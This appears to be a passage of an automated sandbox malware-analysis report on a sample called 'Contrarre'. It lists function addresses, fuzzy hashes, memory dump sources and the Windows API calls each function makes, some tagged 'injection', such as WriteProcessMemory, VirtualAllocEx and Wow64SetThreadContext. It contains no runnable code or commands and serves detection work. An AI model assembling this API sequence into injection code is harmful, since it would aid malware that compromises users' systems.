Instruction Fuzzy Hash: 6E5108B4E0520A9FCB48CFA5D9955EEFBB1FB89300B14A826D015F7364D7389A018F10

Function 0A142568 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2252dbd3f6ecb985f0111f9864bdbb9b81390c19650f4a91c5bf530348c31a
Instruction ID: 93a92cd5ea110673c7d35254e729f52d424a4254e7a09f20ecb5e459b45b0290
Opcode Fuzzy Hash: cf2252dbd3f6ecb985f0111f9864bdbb9b81390c19650f4a91c5bf530348c31a
Instruction Fuzzy Hash: 8C4109B4D09208DBEB18CFAAD4446EDFBF6EF99300F15E029E409A7251DB745882CF14

Function 0B8B16D1 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acdaef8c61af160d7568647878f05be0699a30a0b604632af3a0d91eb887ae99
Instruction ID: 757d1897ab9c46800d6de23271f1f61b3aa0eb799e0dd49bf724d08db570f49d
Opcode Fuzzy Hash: acdaef8c61af160d7568647878f05be0699a30a0b604632af3a0d91eb887ae99
Instruction Fuzzy Hash: E641E3B4E14209DFDB08DFA9D954AAEFBF2EB88301F24C06AD519FB364D73449418B54

Function 0B8B16E0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16816ee660fb8186b2239f0258e04cd138557b89b0e39b8304eb93199e20e96
Instruction ID: 0da34f0e16b65af0afd9e0773fde529c51ee74d992fbf3711b97ca85d9e58322
Opcode Fuzzy Hash: b16816ee660fb8186b2239f0258e04cd138557b89b0e39b8304eb93199e20e96
Instruction Fuzzy Hash: 8D4115B0E14209DFDB08DFAAD854AAEFBF2FB88300F24C06AD419BB354D73449418B54

Function 0A142558 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96cae83b6b5b246d17c780346540eaf97df8287f4ca5b8d8094ccbc03da730ff
Instruction ID: 6d71c80904d60a4f9aa3d4e4ba439c89033929da9e2d41827ecd7f08b919d5b2
Opcode Fuzzy Hash: 96cae83b6b5b246d17c780346540eaf97df8287f4ca5b8d8094ccbc03da730ff
Instruction Fuzzy Hash: DD4129B0D09208DBEB18CFAAD5546EDFBF6EF9A300F15A029E409B7251DB345586CF14

Function 0B8B2098 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf793da114338b2dc7dc1cfac39b730ac38ea858b055e0e86fc77d72cc16d6f
Instruction ID: f69fd212b400ef4db3d0364c24183e6b79c8d28fe1cfcf95d3c525e1ef892dbd
Opcode Fuzzy Hash: ebf793da114338b2dc7dc1cfac39b730ac38ea858b055e0e86fc77d72cc16d6f
Instruction Fuzzy Hash: 7D31C271E01618CBDB58CFAAD94469EBBB3EFC9311F14C1AAD409AB364DB315A85CF40

Function 01852621 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504ee73f3607e7e0f42b9cd79a61271cb6d2853ece88f40c08c03f6c03ef90c4
Instruction ID: 752be44c0cf07a1c6d397b8c786e59000e86542c410707c917b3d02c33664d65
Opcode Fuzzy Hash: 504ee73f3607e7e0f42b9cd79a61271cb6d2853ece88f40c08c03f6c03ef90c4
Instruction Fuzzy Hash: 1C21FB75E016188BDB58CFAAD8402DEBBF3AFC9314F14C16AD908A7264DB340A55CF51

Function 0B8B0040 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb785c426f84076170ead2f5c3c6427918b463efe6faa12c6d91bfefb3e0279f
Instruction ID: 26d0f701cd5127cc52ab1220f8b59fff0781d89acb285b97fe8da60d37d3cac0
Opcode Fuzzy Hash: cb785c426f84076170ead2f5c3c6427918b463efe6faa12c6d91bfefb3e0279f
Instruction Fuzzy Hash: DA21CD71E006189BEB58CFABD84079EF7F7AFC8200F04C576C418A7264EB3419458F51

Function 0B8B2088 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af9cb793ad560552cdf66db42e287cda3fe77b6133bdf08b20d620e27a3d9b1
Instruction ID: 33130cf08ca01f3557e529a1b0558ce8e6fc275be19577ec13640178c910e566
Opcode Fuzzy Hash: 1af9cb793ad560552cdf66db42e287cda3fe77b6133bdf08b20d620e27a3d9b1
Instruction Fuzzy Hash: 1D212A70E016588FDB19CFAAC8446DEBFF3AFC9300F18C1AAD408AB365DA300945CB51

Function 0A14511C Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d738afe9f2ff8c885ec60e6f8455e7e1e1bd6d97245a2e8c587878501a1384a9
Instruction ID: 3c67d16d073f0a171bb1815aa455e01b84d6d582f8e8b4d7bd79926d3c9d95a4
Opcode Fuzzy Hash: d738afe9f2ff8c885ec60e6f8455e7e1e1bd6d97245a2e8c587878501a1384a9
Instruction Fuzzy Hash: 75E0923494A214EFE764CF58D4447B8B7BAFB0E361F4120A9800AA3252D73089C4CE04

Function 05723649 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 057236D6
GetCurrentThread.KERNEL32 ref: 05723713
GetCurrentProcess.KERNEL32 ref: 05723750
GetCurrentThreadId.KERNEL32 ref: 057237A9

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cde6c4798ce06307f5a8abbbd8616c37242a7f1de2f089e5ab031305c596b101
Instruction ID: de1a37ea20bf23f265e4c47e4d09bb485c13a1e41cea85a1f9c32da4cdc3626d
Opcode Fuzzy Hash: cde6c4798ce06307f5a8abbbd8616c37242a7f1de2f089e5ab031305c596b101
Instruction Fuzzy Hash: 81516AB0901349CFEB44CFA9D588B9EBBF1FF48304F208469E419A73A1D7745984CB65

Function 05723658 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 057236D6
GetCurrentThread.KERNEL32 ref: 05723713
GetCurrentProcess.KERNEL32 ref: 05723750
GetCurrentThreadId.KERNEL32 ref: 057237A9

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7d0145c4e467d60dec52ec2ed14d97099ce8924981a7b8d91295e7ed55c5a11c
Instruction ID: 943284984a955948561e0691d1324f4c75aa37f290802222a8e3c6d6988d2f4f
Opcode Fuzzy Hash: 7d0145c4e467d60dec52ec2ed14d97099ce8924981a7b8d91295e7ed55c5a11c
Instruction Fuzzy Hash: 405158B09013498FEB44CFAAD588B9EBBF1BF48304F208469E419A7390D7745984CB65

Function 0A14196D Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0A141BAE

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a590fe81c775759c21d1c3b8d5a86f0b8373eb72b6fbcf257abfad59113ed776
Instruction ID: 6d4754a9dd0207e601047b47181b4b5a422911002d10919895dbb61997a55cbf
Opcode Fuzzy Hash: a590fe81c775759c21d1c3b8d5a86f0b8373eb72b6fbcf257abfad59113ed776
Instruction Fuzzy Hash: D9A16B71D003599FEB14CF68C8417EEBBB2BF44310F1586A9D859A7280DB7599C1CF91

Function 0A141978 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0A141BAE

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 83856730a7cc4bdc823971c0e1e303472da032a35cc8d514653dea1e51fb2606
Instruction ID: 1500ea73789e303068394109195541d632d5559b8e10d9ffce99cbd485691819
Opcode Fuzzy Hash: 83856730a7cc4bdc823971c0e1e303472da032a35cc8d514653dea1e51fb2606
Instruction Fuzzy Hash: 3D915B71D003599FEB14CFA8C8417EEBBB2BF44310F158669D819A7280DB7499C5CF91

Function 057213C8 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0572161E

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6b40c73f1b32ba793ef604c9f730789b0d228e52463af71e0700aa7fa60ea2ff
Instruction ID: 209fc8a2b2fa2cd3bb1a61cd5537fe1617157e1d10850c401a9d1178fa633af8
Opcode Fuzzy Hash: 6b40c73f1b32ba793ef604c9f730789b0d228e52463af71e0700aa7fa60ea2ff
Instruction Fuzzy Hash: E3713770A00B158FDB64DF2AD445B6ABBF5FF88304F008A2DD48AD7A50DB75E845CB91

Function 05727DB0 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05727F22

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5844a820c63b1308d3236cb213e18c795da8f91cbb3a822fee5370cb230dd35f
Instruction ID: 080a539f4446cf2ee57b58f33abe00d0ff7b3b3065b97add65677354897a7291
Opcode Fuzzy Hash: 5844a820c63b1308d3236cb213e18c795da8f91cbb3a822fee5370cb230dd35f
Instruction Fuzzy Hash: C951E1B1C04249AFCF15CFA9C984ADDBFB2FF48300F24816AE819AB221D7759955DF50

Function 05727E10 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05727F22

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ab05883c02cfcd2f366c7b48b0776fe561edeb096e53803e3b91f9ef2508d7f4
Instruction ID: a0ad9b19aeff897f9b9508aab2f3b24ebc46341df011efd7510e7c567d27262b
Opcode Fuzzy Hash: ab05883c02cfcd2f366c7b48b0776fe561edeb096e53803e3b91f9ef2508d7f4
Instruction Fuzzy Hash: 6641C0B1D043589FDB14CF9AC984ADEFBB6FF48310F24812AE819AB250D7759885CF90

Function 05726D14 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0572A4A1

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: d3e55cf29b7cba390b736514cb62db4708067358e6d14a27ee8ec72a433fb13b
Instruction ID: ec774b4bc296f5c2cda8916b56e8eaa26f47912b4adb0deb9974c406e517a0d7
Opcode Fuzzy Hash: d3e55cf29b7cba390b736514cb62db4708067358e6d14a27ee8ec72a433fb13b
Instruction Fuzzy Hash: 4A4125B4900359CFDB14CF99C488BAABBF6FF88314F24C459E519AB321D775A841CBA0

Function 0185B165 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 0185B221

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6316cad57724db21a1fdad4dd398fde4d2824cf012a5267f8bf10ff4c86507d8
Instruction ID: 8e4a78ae68feaf69ed537822cc6b76904ca7387385fc6282934a2bd95ae32b9d
Opcode Fuzzy Hash: 6316cad57724db21a1fdad4dd398fde4d2824cf012a5267f8bf10ff4c86507d8
Instruction Fuzzy Hash: A541D1B0C01719CFEB24CFA9D844BDDBBB2BF59304F20806AD409AB251DB756A86CF50

Function 01859D60 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 0185B221

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ed981c9fee9c0c28334425c4a90c00193d8c3dd744c000ed7951ada85f20a836
Instruction ID: 066bb3e0bde6fd9d2e99d8c40e48eaedb72f4619ae1400cd53498011b15c9cab
Opcode Fuzzy Hash: ed981c9fee9c0c28334425c4a90c00193d8c3dd744c000ed7951ada85f20a836
Instruction Fuzzy Hash: A741B270C0171DCBEB64DFA9D844BDDBBB6BF59304F20806AD408AB251DB756985CF90

Function 0A1416E8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0A141780

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0fd594d3a846fe8d4be5480847bcacef03e738894913e2c7a17891a7b8e6bb1e
Instruction ID: 2916509481bfdfd8d255fc93681de1d3a4983da1b41aa44a1be9a8866a0db6d0
Opcode Fuzzy Hash: 0fd594d3a846fe8d4be5480847bcacef03e738894913e2c7a17891a7b8e6bb1e
Instruction Fuzzy Hash: 5D2135769003499FDF10CFAAC881BEEBBF1FF48310F108529E959A7641C7799985CBA0

Function 0A1417DA Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0A141860

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c6f3b498e2d623406862071aeae7f08123cf24c4c21e486855dbaf9694643d15
Instruction ID: 7836666eeccbd95c02e23c1ba7178d303bb7699f01ad0f99facffa1a733c325c
Opcode Fuzzy Hash: c6f3b498e2d623406862071aeae7f08123cf24c4c21e486855dbaf9694643d15
Instruction Fuzzy Hash: F42148718003599FDB10DFAAC8417EEFBF5FF48310F14852AE959A7641C7789980CBA0

Function 0A1416F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0A141780

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a520828c0dee76719834ae4d72ce1d1320f90db12b4ec42340cf8f31b814eebb
Instruction ID: 1065f52b7ecf1446929a82794b82668f7b13081e894be796ac0921335aded34c
Opcode Fuzzy Hash: a520828c0dee76719834ae4d72ce1d1320f90db12b4ec42340cf8f31b814eebb
Instruction Fuzzy Hash: 732127759003499FDB10DFAAC881BEEBBF5FF48310F108529E959A7240C7799984CBA4

Function 05723898 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05723927

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 82d2750c246df48a3d8892437ba90f86aeca0cb442542bcbfabdea218fdf9e4d
Instruction ID: a819ce9e9cc85b0777523cc87da0d1cf147280e530d87873ea96d0246d3b93c4
Opcode Fuzzy Hash: 82d2750c246df48a3d8892437ba90f86aeca0cb442542bcbfabdea218fdf9e4d
Instruction Fuzzy Hash: 3621E5B5901348DFDB10CFAAD484ADEFBF5EB48310F14841AE954A7350D379A954CFA4

Function 0A141118 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A14119E

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7562c5f6974c3ea5a0157328a9b0daf84926e5802d65a2c42916b49de5b4745a
Instruction ID: eec14406083f0d9e2172e44513ae886a43c6db558f7c23fefff0be42365f1c44
Opcode Fuzzy Hash: 7562c5f6974c3ea5a0157328a9b0daf84926e5802d65a2c42916b49de5b4745a
Instruction Fuzzy Hash: A82157B19003489FDB10DFAAC4807EEBBF4AF48210F148429D559A7641D7789985CFA4

Function 0A141120 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A14119E

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cfaf05c354132c9b2c92cefece066a58b554c3b6c8edfa68d257f4eecde573e1
Instruction ID: 7b87cff9ccf9e5682fcc7025a99dd171792274a951afe6728b9ed1561bdda1e8
Opcode Fuzzy Hash: cfaf05c354132c9b2c92cefece066a58b554c3b6c8edfa68d257f4eecde573e1
Instruction Fuzzy Hash: CE2135B19003089FDB10DFAAC485BEEBBF4AF88314F14842AD519A7640C778A985CFA4

Function 0A1417E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0A141860

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bba2ebed1874c17ca84f3024292d8082f1c9da06db7115811fb5f6a4ae5ea5a6
Instruction ID: 92f1be8be32ef826b78be8c677ca6e177cdec7deabd38a8d5bb2e44301ac9a60
Opcode Fuzzy Hash: bba2ebed1874c17ca84f3024292d8082f1c9da06db7115811fb5f6a4ae5ea5a6
Instruction Fuzzy Hash: 752114B18003599FDB10DFAAC880BEEFBF5FF48310F50842AE519A7640C7799980CBA4

Function 057238A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05723927

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f364f051db30a111eb0aa26761759d0ddda39c422b509f8c878fa04cdf97969c
Instruction ID: 7a7834bbe08ebf4b5145c5c322e6c96ccd7a011b70ae4d6cdad22c3356e676a5
Opcode Fuzzy Hash: f364f051db30a111eb0aa26761759d0ddda39c422b509f8c878fa04cdf97969c
Instruction Fuzzy Hash: 3221E4B59003489FDB10CFAAD484ADEFBF4FB48310F14841AE954A7350D379A950CFA4

Function 0A141628 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0A14169E

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 446d78a07866dadc1324f6abca94f6bb16ab13f2f029c023c0ad0e2cb73d86ea
Instruction ID: 66e28e86fea975a082f54d9ef8439afe527aee36273644b84d1c81530de821ab
Opcode Fuzzy Hash: 446d78a07866dadc1324f6abca94f6bb16ab13f2f029c023c0ad0e2cb73d86ea
Instruction Fuzzy Hash: 881189718003489FDF10CFAAC840BEEBBF5AF88314F248419E555A7250C7799580CFA0

Function 0A141068 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0A1410D2

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 19d35d3964834ffac68ea162878963a8b29caeef2fd0309b082c7c7c3e1ba85a
Instruction ID: 28b8c3a7148caa837a8cf2045844d0bb86a518af2dc8f7b6eee3c2ea96077af3
Opcode Fuzzy Hash: 19d35d3964834ffac68ea162878963a8b29caeef2fd0309b082c7c7c3e1ba85a
Instruction Fuzzy Hash: 251149759003888FDB10DFAAC4457EEFBF5AF48224F14845AD515A7640D7B96980CF94

Function 0A141630 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0A14169E

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: becb56ed9ec5b4877690e9372c36ac5035c5095fbb6a0e4495b6f147822ad1aa
Instruction ID: 45c3f66b507e8c104cdd4329a322e6002600c81b4e7865b616651d4a25501de2
Opcode Fuzzy Hash: becb56ed9ec5b4877690e9372c36ac5035c5095fbb6a0e4495b6f147822ad1aa
Instruction Fuzzy Hash: 7F1137769003489FDB10DFAAC844BDEBBF5FF88310F148419E515A7650C7B9A580CFA4

Function 0A1460AA Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0A14610D

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 987255df19d3099135ec7cd39ab91e4d28a86ee0287e1c73bee09d48632f191d
Instruction ID: 5d84fa73473fb1dab256ffea98905448ef25e838562dcd86d958586de8cc29aa
Opcode Fuzzy Hash: 987255df19d3099135ec7cd39ab91e4d28a86ee0287e1c73bee09d48632f191d
Instruction Fuzzy Hash: DA1134B68003499FDB11DF9AD885BEABFF4EB49324F14845AD464A7241C375A980CFA1

Function 0A141070 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0A1410D2

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d35bcbd1049a8bd55888dc6ef018085001bc31735494bd06c6c93f354ec075ed
Instruction ID: 5d0b41fd581450dbee5adcff867b7d574672782f010873b35fc5eea974e0e275
Opcode Fuzzy Hash: d35bcbd1049a8bd55888dc6ef018085001bc31735494bd06c6c93f354ec075ed
Instruction Fuzzy Hash: 77113AB59003888FDB20DFAAC4457DEFBF5AF88324F24841AD519A7640C779A584CFA4

Function 057215B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0572161E

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1ab4c477d8e0d964c2b7c876ef2780b1a1abf54219010953149823f30e544c07
